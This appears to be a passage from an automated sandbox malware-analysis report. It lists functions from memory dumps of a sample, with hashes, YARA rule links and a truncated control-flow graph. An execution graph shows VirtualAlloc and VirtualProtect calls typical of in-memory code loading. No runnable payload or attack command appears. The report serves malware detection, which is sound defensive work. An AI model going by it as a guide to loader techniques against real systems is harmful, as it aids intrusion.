                                                                                                                    • Opcode Fuzzy Hash: fa693c5268d75263a33ba3f7e77b68fde0f2473751fd4d3e86d70f453ce828df
                                                                                                                    • Instruction Fuzzy Hash: C1414826B0C6590EE318F7B870AA6FDBB90DF89325B1545FBD04EC71EBDD18A8418280
                                                                                                                    Function 00007FFD9B7E0910 Relevance: .2, Instructions: 152COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0ca65cb8cf72631306de8cf4fb36da47f7965d91aeadc85dd8c28db5cb1b5349
                                                                                                                    • Instruction ID: 26217fbe000bcc45f56243662346b5da4160da32a07a3e5f33af90f48fa42908
                                                                                                                    • Opcode Fuzzy Hash: 0ca65cb8cf72631306de8cf4fb36da47f7965d91aeadc85dd8c28db5cb1b5349
                                                                                                                    • Instruction Fuzzy Hash: 8B412626B0C6590EE318F7B870AAAF9B790DF89325B1545BFD04EC71EBDD18A8418285
                                                                                                                    Function 00007FFD9B7E0960 Relevance: .1, Instructions: 117COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9e1859af4d4c5b59877c4f41f4906b29ee30ce896ec2307596633b7d6a2c7430
                                                                                                                    • Instruction ID: 7d7512d8e7d9c368ec679cb7c0dacdac894c69c3f9f192d0e589a5e38ccb07e3
                                                                                                                    • Opcode Fuzzy Hash: 9e1859af4d4c5b59877c4f41f4906b29ee30ce896ec2307596633b7d6a2c7430
                                                                                                                    • Instruction Fuzzy Hash: BF312726B1CA1D0FE358B768646AAF973C1DF88325B1145BAE40EC72FBDC18AC418284
                                                                                                                    Function 00007FFD9B7E0998 Relevance: .1, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 80a6196cecca95c604a617763ad625a9ec508aeb4e6b233de6a0d1efbf0a21ed
                                                                                                                    • Instruction ID: 69fc87df37b29babb665f4315d9f8bbf2aafc180b90e4d545e596533f95bd590
                                                                                                                    • Opcode Fuzzy Hash: 80a6196cecca95c604a617763ad625a9ec508aeb4e6b233de6a0d1efbf0a21ed
                                                                                                                    • Instruction Fuzzy Hash: DD21DA21B29A1D0FF758E76C946A679B7C2EF9C311B5101B9E80EC32FADD24EC418281
                                                                                                                    Function 00007FFD9B7E0C25 Relevance: .1, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 16a9692b50ef07b6d6e5945e06f0ed3cfb896cec911b47812718557dafd4f849
                                                                                                                    • Instruction ID: 89d2874631a7422827a65c6c4aef642ab49d573a3fd44ef8c7dc8d2a8d6d48e9
                                                                                                                    • Opcode Fuzzy Hash: 16a9692b50ef07b6d6e5945e06f0ed3cfb896cec911b47812718557dafd4f849
                                                                                                                    • Instruction Fuzzy Hash: A321EA36F0D79D4BE722A7B898560DC7B60EF41325F1642B3C148CB1F3D92826468781
                                                                                                                    Function 00007FFD9B7E0F60 Relevance: .1, Instructions: 66COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d34d0b7899710b848f4bd2e36919db18784bcbf7d98af1ad6d5f44e11d0e3932
                                                                                                                    • Instruction ID: 9e0d74c6e69f886f7e96d7df459249f4200ef15f0c9bf08a73e20e2cbe548470
                                                                                                                    • Opcode Fuzzy Hash: d34d0b7899710b848f4bd2e36919db18784bcbf7d98af1ad6d5f44e11d0e3932
                                                                                                                    • Instruction Fuzzy Hash: 47218B74528AAA8EE348CF58C4697AABEE0E799365F00017FC01DE3BE0D7B90060CB40
                                                                                                                    Function 00007FFD9B7E6872 Relevance: .1, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6fc33d3286cc148d45c2755b447de8305450aebec5638bd6952e4f9db5657e05
                                                                                                                    • Instruction ID: 60c713b20f78db1a43b7ce27f188d61876387c032c1060ee3b7d66bd744e690b
                                                                                                                    • Opcode Fuzzy Hash: 6fc33d3286cc148d45c2755b447de8305450aebec5638bd6952e4f9db5657e05
                                                                                                                    • Instruction Fuzzy Hash: 0C115630E19A1D4FEBB4E75884756B87290FF58700F5202B9D45EE72B2EE28AE558740
                                                                                                                    Function 00007FFD9B7E0C38 Relevance: .1, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3c3d5cf43d96dfcbe2dac10ec240ae7fec97a0be7667544d2b0a3d96659602f0
                                                                                                                    • Instruction ID: 61a4cbaa70a7f91348211ec23a931026ce243016f7913f7633bd52eb78d11e79
                                                                                                                    • Opcode Fuzzy Hash: 3c3d5cf43d96dfcbe2dac10ec240ae7fec97a0be7667544d2b0a3d96659602f0
                                                                                                                    • Instruction Fuzzy Hash: D6115135B0E78D8FE722DBA898661DC7BB0EF41711F1646B7C044DB1F2D93416468781
                                                                                                                    Function 00007FFD9B7E0C48 Relevance: .0, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 61f1f0bff3c2cd9053e84af1bd2fcf9a365a0b39b9b9597fdbb5684ded6939a6
                                                                                                                    • Instruction ID: c2d3d56fc184a97bda6dbff624882d20c8ec96e7f8124a1900a770a5dc31be8d
                                                                                                                    • Opcode Fuzzy Hash: 61f1f0bff3c2cd9053e84af1bd2fcf9a365a0b39b9b9597fdbb5684ded6939a6
                                                                                                                    • Instruction Fuzzy Hash: 3D018035A0E38D8FD722DBA8886509CBFB0EF46700F1642E7C044DB1B2D9345A458741
                                                                                                                    Function 00007FFD9B7E69C4 Relevance: .0, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                    • Instruction ID: c022d6248878a4bf0d6882370fe0fde32f1d4e6e038dd653131c1aa59c018b79
                                                                                                                    • Opcode Fuzzy Hash: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                    • Instruction Fuzzy Hash: 86018630A0951E4EEB78EB84D8657F873A0FF54300F1102FAC44EE31B2EE286E918B41
                                                                                                                    Function 00007FFD9B7E0C50 Relevance: .0, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ca31839d6e060c61fff81f420571996c7c782d8800adbb5e53c6c57fff4e29fa
                                                                                                                    • Instruction ID: d67bd64d4e33f746b6cec69db58676926d0097087bb3d555c1ea295705898b75
                                                                                                                    • Opcode Fuzzy Hash: ca31839d6e060c61fff81f420571996c7c782d8800adbb5e53c6c57fff4e29fa
                                                                                                                    • Instruction Fuzzy Hash: 64017C35E0E38D9FE722DBA8886549CBFB0EF06704F1642E7C044DB1B2E9385A448741
                                                                                                                    Function 00007FFD9B7E5E02 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 00210f38a21297454cba502408752b439d1ecd88c6a798c271d5d895893ca0bc
                                                                                                                    • Instruction ID: 9919502bac23dda274235eb2ad2113917a143c6e7e2294ea7a3c1832928d6d2f
                                                                                                                    • Opcode Fuzzy Hash: 00210f38a21297454cba502408752b439d1ecd88c6a798c271d5d895893ca0bc
                                                                                                                    • Instruction Fuzzy Hash: C1F0C231648A0A8FCB54DF04C494FA973B1FB98311F1586A9D00ED7260DA34AA85DF81
                                                                                                                    Function 00007FFD9B7E68B1 Relevance: .0, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                    • Instruction ID: 7d9e36f198f3f241726ac99004285ac137ef8fbea0ecd0dfb3ddb2f3111064dd
                                                                                                                    • Opcode Fuzzy Hash: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                    • Instruction Fuzzy Hash: FBF03030A0960E4AEAB8E754D4666F833A1EF54300F1142B9D85EE72B2DE29BE958741
                                                                                                                    Function 00007FFD9B7E606A Relevance: .0, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 722b7d09a3da5f298d46c8311e908dced07fc104a4f23c91bc6d4aa99059930b
                                                                                                                    • Instruction ID: 6f4ab03e8ef1b4a5e8005f8c97f1c9cecc5d54058d762a64fd2462ab378e8403
                                                                                                                    • Opcode Fuzzy Hash: 722b7d09a3da5f298d46c8311e908dced07fc104a4f23c91bc6d4aa99059930b
                                                                                                                    • Instruction Fuzzy Hash: CBE08C01F1A61903EB68A9FC547A6B533D2EF98700F220235E04EC32F2DD38AD421240
                                                                                                                    Function 00007FFD9B7E1DC0 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                    • Instruction ID: efca8cc2db5875ec3c0e08d5ad81cc4b52a224e46e3f77b68766f1ebfb8b33b2
                                                                                                                    • Opcode Fuzzy Hash: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                    • Instruction Fuzzy Hash: F1E01A74F0D61E87F768A688C8627E97265EF88300F150278DA1E937F1CE2CAE418655
                                                                                                                    Function 00007FFD9B7E0D34 Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction ID: 172cd546862ac56252cd1f295eca16a0a6cfb85c91e2fbedd913172999d540fe
                                                                                                                    • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction Fuzzy Hash: 8CE01734B0930ECBE720EB94C4956EEB7A1EF51721F118766C401872F9EA78A784CA80
                                                                                                                    Function 00007FFD9B7E0B9D Relevance: .0, Instructions: 14COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                    • Instruction ID: 60deb8c062751808bc93f184146684346ef2862575fe1d146fdd7938fea1528b
                                                                                                                    • Opcode Fuzzy Hash: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                    • Instruction Fuzzy Hash: BFC0123062990E8FDA80BB28C888824BBA0FF0E301BDA18E0E00CCB1B1D61999908701
                                                                                                                    Function 00007FFD9B7E06A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 70dfd15de92720280ace9cd978483441caa22fb2408bbdc47ab4b125b5b05ef5
                                                                                                                    • Instruction ID: de597fa55665355bb1406378e4b19f18b81618159e6699874b791686d7f002da
                                                                                                                    • Opcode Fuzzy Hash: 70dfd15de92720280ace9cd978483441caa22fb2408bbdc47ab4b125b5b05ef5
                                                                                                                    • Instruction Fuzzy Hash: 1EC01201F0B61F00E82031EA24A30ACB1009FC4A10FD20232C009800B1980E22C60156
                                                                                                                    Function 00007FFD9B7E12B0 Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction ID: 2d1f1257cea26e7b06385fac8dd03f19bd777868958997b8fcdb7cf09d2f4caa
                                                                                                                    • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction Fuzzy Hash: 92C08C3051180C8FC908EB28C88490433A0FF09200BC30090E009C7170D219DCC0C780
                                                                                                                    Function 00007FFD9B7E4960 Relevance: .0, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 555718bc160314ec4c7826c4d4092ea92db78b88135855282f337b5007ab4058
                                                                                                                    • Instruction ID: 1b828be7a788d8688e1afa36b7491d0bb9b6a9beae45559ab269d8e968e9a0f0
                                                                                                                    • Opcode Fuzzy Hash: 555718bc160314ec4c7826c4d4092ea92db78b88135855282f337b5007ab4058
                                                                                                                    • Instruction Fuzzy Hash: E6C08C00F0CD1B02F759A2042431A7E04029F80608F8207B0E81E877EECE0C1E0212CB
                                                                                                                    Function 00007FFD9B7E06C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                    • Instruction ID: 01c3e374eea77e638630065b1219445ebd2a18699715889d2f11f2754a3a298d
                                                                                                                    • Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                    • Instruction Fuzzy Hash: E8B01200D5750F00E42431FA189306574405F44100FC20270D40C501B1984D12D40252

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFD9B7E09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                                    • API String ID: 0-1692736845
                                                                                                                    • Opcode ID: 325cc8660a8b228ebcb307bf99baa3fd23ac291a958007da991e244d11b16cad
                                                                                                                    • Instruction ID: d880b3040255ccf01a5784be9c05eb18c6412bf6434959b0e42e2bc10fbd86fc
                                                                                                                    • Opcode Fuzzy Hash: 325cc8660a8b228ebcb307bf99baa3fd23ac291a958007da991e244d11b16cad
                                                                                                                    • Instruction Fuzzy Hash: 5241C20BF0D5A645E31973FC752A9ED6B648FC127EB1A86B7E15E890D78C08608183E5

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:4.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:6
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 32980 7ffd9b7cb4ba 32981 7ffd9b7cb4c9 VirtualProtect 32980->32981 32983 7ffd9b7cb5ae 32981->32983 32976 7ffd9b7cc491 32977 7ffd9b7cc49f VirtualAlloc 32976->32977 32979 7ffd9b7cc554 32977->32979

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9B7C0D48 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7c0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5\_H
                                                                                                                    • API String ID: 0-3325266018
                                                                                                                    • Opcode ID: e5f4df37e138d00cb34f6cbf76eccba469a68c7a92ea50581934cf7972370ba3
                                                                                                                    • Instruction ID: 3055e40ef9087b1b198b96baec273ad81207112645b583e53055fae7985a2d64
                                                                                                                    • Opcode Fuzzy Hash: e5f4df37e138d00cb34f6cbf76eccba469a68c7a92ea50581934cf7972370ba3
                                                                                                                    • Instruction Fuzzy Hash: AE91E1B5A0DA899FE759DB6C8869BF97FE0EB95300F0501BED049D73E2DBB814108741
                                                                                                                    Function 00007FFD9B7D1752 Relevance: 2.2, Strings: 1, Instructions: 949COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 7ffd9b7d1752 1 7ffd9b7d1757-7ffd9b7d177d 0->1 4 7ffd9b7d18d1-7ffd9b7d18fb 1->4 5 7ffd9b7d1783-7ffd9b7d17ae 1->5 9 7ffd9b7d1947-7ffd9b7d194a 4->9 10 7ffd9b7d18fd-7ffd9b7d191a 4->10 17 7ffd9b7d17bd-7ffd9b7d1845 5->17 18 7ffd9b7d17b0-7ffd9b7d17ba 5->18 16 7ffd9b7d1951-7ffd9b7d1958 9->16 14 7ffd9b7d1a8b-7ffd9b7d1a93 10->14 15 7ffd9b7d1920-7ffd9b7d1945 10->15 24 7ffd9b7d1a94-7ffd9b7d1a99 14->24 15->9 20 7ffd9b7d195a-7ffd9b7d1967 16->20 51 7ffd9b7d188c-7ffd9b7d188f 17->51 52 7ffd9b7d1847-7ffd9b7d188a 17->52 18->17 23 7ffd9b7d196e-7ffd9b7d1986 20->23 33 7ffd9b7d1a2c-7ffd9b7d1a42 23->33 34 7ffd9b7d198c-7ffd9b7d19df 23->34 27 7ffd9b7d1a9b-7ffd9b7d1aaf 24->27 28 7ffd9b7d1a47-7ffd9b7d1a62 24->28 35 7ffd9b7d1c4d-7ffd9b7d1c4e 27->35 44 7ffd9b7d1a69-7ffd9b7d1a84 28->44 33->35 34->44 60 7ffd9b7d19e5-7ffd9b7d19f0 34->60 37 7ffd9b7d1c55-7ffd9b7d1c61 35->37 38 7ffd9b7d1c50 call 7ffd9b7d2918 35->38 38->37 44->14 53 7ffd9b7d1891-7ffd9b7d18a2 51->53 54 7ffd9b7d18a4-7ffd9b7d18a5 51->54 59 7ffd9b7d18b1-7ffd9b7d18cb 52->59 53->59 54->59 59->4 59->5 61 7ffd9b7d19f6-7ffd9b7d1a00 60->61 62 7ffd9b7d0f9d-7ffd9b7d0fdc 60->62 61->24 65 7ffd9b7d1a06-7ffd9b7d1a26 61->65 73 7ffd9b7d0fde-7ffd9b7d1149 62->73 65->33 65->34 98 7ffd9b7d114b-7ffd9b7d1154 73->98 99 7ffd9b7d1178-7ffd9b7d11b9 73->99 100 7ffd9b7d1699-7ffd9b7d16cf 98->100 101 7ffd9b7d115a-7ffd9b7d116a 98->101 111 7ffd9b7d11bb-7ffd9b7d11cd 99->111 112 7ffd9b7d11ce-7ffd9b7d1243 99->112 113 7ffd9b7d1748-7ffd9b7d1751 100->113 114 7ffd9b7d16d1-7ffd9b7d1710 100->114 105 7ffd9b7d1170-7ffd9b7d1174 101->105 105->99 111->112 129 7ffd9b7d1245-7ffd9b7d126e 112->129 130 7ffd9b7d1274-7ffd9b7d12c3 112->130 113->0 123 7ffd9b7d172a-7ffd9b7d1746 114->123 124 7ffd9b7d1712-7ffd9b7d1715 114->124 123->113 123->114 124->123 125 7ffd9b7d1717-7ffd9b7d1727 124->125 125->123 129->130 138 7ffd9b7d12c5-7ffd9b7d12ca 130->138 139 7ffd9b7d12cf-7ffd9b7d1307 130->139 141 7ffd9b7d1683-7ffd9b7d1693 138->141 144 7ffd9b7d1309-7ffd9b7d130e 139->144 145 7ffd9b7d1313-7ffd9b7d134b 139->145 141->100 141->105 144->141 149 7ffd9b7d1357-7ffd9b7d138f 145->149 150 7ffd9b7d134d-7ffd9b7d1352 145->150 154 7ffd9b7d139b-7ffd9b7d13d3 149->154 155 7ffd9b7d1391-7ffd9b7d1396 149->155 150->141 159 7ffd9b7d13d5-7ffd9b7d13da 154->159 160 7ffd9b7d13df-7ffd9b7d1417 154->160 155->141 159->141 164 7ffd9b7d1419-7ffd9b7d141e 160->164 165 7ffd9b7d1423-7ffd9b7d145b 160->165 164->141 169 7ffd9b7d1467-7ffd9b7d149f 165->169 170 7ffd9b7d145d-7ffd9b7d1462 165->170 174 7ffd9b7d14ab-7ffd9b7d14e3 169->174 175 7ffd9b7d14a1-7ffd9b7d14a6 169->175 170->141 179 